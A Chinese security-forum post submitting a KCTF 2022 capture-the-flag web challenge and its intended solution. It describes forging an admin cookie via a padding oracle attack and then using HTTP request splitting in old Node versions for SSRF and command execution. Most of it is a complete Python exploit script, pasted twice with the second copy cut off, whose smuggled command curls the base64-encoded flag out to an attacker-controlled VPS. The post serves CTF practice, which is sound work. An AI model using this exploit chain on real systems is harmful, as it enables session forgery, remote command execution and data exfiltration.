首页
社区
课程
招聘
[原创]2022秋KCTF防守方提交题目
发表于: 2022-10-16 12:17 4171

[原创]2022秋KCTF防守方提交题目

2022-10-16 12:17
4171

作者(Achilles)来自星盟安全团队

这是一个node项目,题目需要比赛者ssrf进而命令执行获得藏在比赛题目源代码中的flag。黑盒,不给源代码附件。

先访问/admin,发现它是解密cookie判断是不是管理员,用padding oracle attack伪造管理员cookie

http.get函数在node的8版本(其中的较低版本)或者更低版本存在被http拆分攻击危险。攻击者通过这个漏洞可以达到http走私的效果。

通过走私满足/C00mmmmanD对ip的要求,从而命令执行

下面是一把梭脚本,注意把这个脚本放在这个项目https://github.com/pspaul/padding-oracle文件夹里面。这个脚本执行的命令是

在vps那里nc,收到后base64解密后得到flag

 
 
 
 
 
curl xxxx:xxx/?`cat flag|grep flag|base64`
curl xxxx:xxx/?`cat flag|grep flag|base64`
# -*- coding: utf-8 -*-
import urllib.parse
from http.cookies import SimpleCookie
import requests
from padding_oracle import PaddingOracle
from optimized_alphabets import json_alphabet
 
attackIP = ""
attackPort = ""
vpsIP = ""
vpsPort = ""
 
def payload_encode(raw):
    payload = raw.replace('\n', '\u010d\u010a') \
        .replace('+', '\u012b') \
        .replace(' ', '\u0120') \
        .replace('"', '\u0122') \
        .replace("'", '\u0a27') \
        .replace('[', '\u015b') \
        .replace(']', '\u015d') \
        .replace('`', '\u0127') \
        .replace('"', '\u0122') \
        .replace("'", '\u0a27') \
        .replace('[', '\u015b') \
        .replace(']', '\u015d')
    return payload
 
def oracle(cipher_hex):
    headers = {'Cookie':"isadmin={}".format(cipher_hex)}
    r = requests.get("http://"+attackIP+":"+attackPort+"/admin",headers = headers)
    response = r.content
    if b"Decrypt error" not in response:
        return True
    else:
        return False
 
def step1():
    r = requests.get(url="http://"+attackIP+":"+attackPort)
    cookie = SimpleCookie(r.headers['Set-Cookie'])
    cookie = cookie["isadmin"].value
    return cookie
 
def step2(cipher):
    o = PaddingOracle(oracle, max_retries=-1)
    plain, _ = o.decrypt(cipher, optimized_alphabet=json_alphabet())
    plain_new = b"{\"admin\":\"1\"}"
    cipher_new = o.craft(cipher, plain, plain_new)
    return cipher_new
 
def step3(new_cookie):
    payload = " HTTP/1.1\n\nPOST /C00mmmmanD HTTP/1.1\nHost: 127.0.0.1\nCookie: isadmin={}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 72\n\ncmd=curl%20" + vpsIP + "%3A" + vpsPort + "%3F%60cat%20flag%7Cgrep%20flag%7Cbase64%60\n\nGET / HTTP/1.1\ntest:"
    payload = payload.format(new_cookie)
    payload = payload_encode(payload)
    r = requests.get("http://"+attackIP+":"+attackPort+"/search?url=http://127.0.0.1:"+attackPort+"/" + urllib.parse.quote(payload))
 
 
if __name__ == "__main__":
    cookie = step1()
    new_cookie = step2(cookie)
    step3(new_cookie)
# -*- coding: utf-8 -*-
import urllib.parse
from http.cookies import SimpleCookie
import requests
from padding_oracle import PaddingOracle
from optimized_alphabets import json_alphabet
 
attackIP = ""
attackPort = ""
vpsIP = ""
vpsPort = ""
 
def payload_encode(raw):
    payload = raw.replace('\n', '\u010d\u010a') \
        .replace('+', '\u012b') \
        .replace(' ', '\u0120') \
        .replace('"', '\u0122') \
        .replace("'", '\u0a27') \
        .replace('[', '\u015b') \
        .replace(']', '\u015d') \
        .replace('`', '\u0127') \
        .replace('"', '\u0122') \
        .replace("'", '\u0a27') \
        .replace('[', '\u015b') \

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2022-11-28 14:20 被Achillesweb编辑 ,原因: flag位置有改动,并且没有用dockerfile,所以去掉多余附件
上传的附件:
收藏
免费 2
支持
分享
最新回复 (2)
雪    币: 47147
活跃值: (20310)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
2
先在CTF创建一个团队:https://ctf.pediy.com/team-join.htm
2022-10-16 12:24
0
雪    币: 47147
活跃值: (20310)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
3
第五题  灾荒蔓延
2022-11-14 15:44
0
游客
登录 | 注册 方可回帖
返回
//